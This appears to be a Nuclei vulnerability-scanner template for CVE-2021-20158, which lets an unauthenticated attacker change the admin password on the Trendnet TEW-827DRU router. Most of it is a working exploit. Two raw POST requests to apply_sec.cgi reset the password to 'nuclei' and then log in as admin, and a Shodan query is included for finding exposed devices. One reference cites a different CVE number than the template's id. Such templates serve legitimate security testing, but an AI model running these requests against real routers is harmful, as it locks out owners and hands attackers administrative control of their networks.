id: CVE-2021-20158 info: name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change author: gy741 severity: critical description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command. reference: - https://www.tenable.com/security/research/tra-2021-54 - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-20158 cwe-id: CWE-287 metadata: shodan-query: http.html:"TEW-827DRU" tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos requests: - raw: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - 'setConnectDevice' - 'setInternet' - 'setWlanSSID' - 'TEW-827DRU' condition: and - type: word part: header words: - "text/html"